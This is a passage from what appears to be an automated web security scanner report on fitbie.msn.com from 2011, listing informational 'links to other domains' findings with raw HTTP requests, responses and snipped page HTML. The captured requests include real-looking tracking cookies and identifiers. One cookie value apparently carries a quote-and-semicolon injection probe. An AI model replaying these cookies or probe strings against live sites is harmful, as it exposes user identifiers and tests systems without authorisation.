<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go ></a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/slideshow/12-ways-make-water-less-boring?gt1=50005" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005&layout=button_count&show_faces=false&action=like&colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/slideshow/12-ways-make-water-less-boring?gt1=50005">Digg</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/eatright;kw=slideshow;slot=300x250.1;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/eatright;topic=healthyeatingbasics;sbtpc=12waystomakewaterlessboring;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>   <a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>    <a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.3. http://fitbie.msn.com/slideshow/why-being-single-better-your-body previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/slideshow/why-being-single-better-your-body

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/fitbie/getfit;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?
http://ad.doubleclick.net/jump/fitbie/getfit;kw=slideshow;slot=300x250.1;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?
http://advertising.microsoft.com/msn/
http://digg.com/submit?url=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1
http://images.rodale.com/dca/400Cal-navButton.gif
http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg
http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://twitter.com/home?status=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1&layout=button_count&show_faces=false&action=like&colorscheme=light;
http://www.facebook.com/sharer.php?u=/slideshow/why-being-single-better-your-body?ocid=xnetr1-1
http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1
http://www.myhomemsn.com/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
http://www.womenshealthmag.com/fitness/running-tips-beginners-guide?cm_mmc=Fit_Life-_-Original-_-Why%20being%20single%20is%20better%20for%20your%20body-_-101%20Greatest%20running%20tips%20for%20women
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false
https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine
https://shop.fitbie.com/

Request

GET /slideshow/why-being-single-better-your-body?ocid=xnetr1-1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:49 +0000
ETag: "1297607329-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43052
Expires: Mon, 14 Feb 2011 02:28:50 GMT
Date: Sun, 13 Feb 2011 14:31:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
<a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99¢ an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go ></a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/slideshow/why-being-single-better-your-body?ocid=xnetr1-1" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1&layout=button_count&show_faces=false&action=like&colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
<p><a href="http://www.womenshealthmag.com/fitness/running-tips-beginners-guide?cm_mmc=Fit_Life-_-Original-_-Why%20being%20single%20is%20better%20for%20your%20body-_-101%20Greatest%20running%20tips%20for%20women" target="_blank">101 Greatest Running Tips for Women</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Digg</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/getfit;kw=slideshow;slot=300x250.1;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/getfit;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>   <a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>    <a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.4. http://fitbie.msn.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/videos

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/videos?vid=

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://images.rodale.com/dca/400Cal-navButton.gif
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.myhomemsn.com/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine
https://shop.fitbie.com/

Request

GET /videos?vid= HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:01 +0000
ETag: "1297607341-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42710
Expires: Mon, 14 Feb 2011 02:28:47 GMT
Date: Sun, 13 Feb 2011 14:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
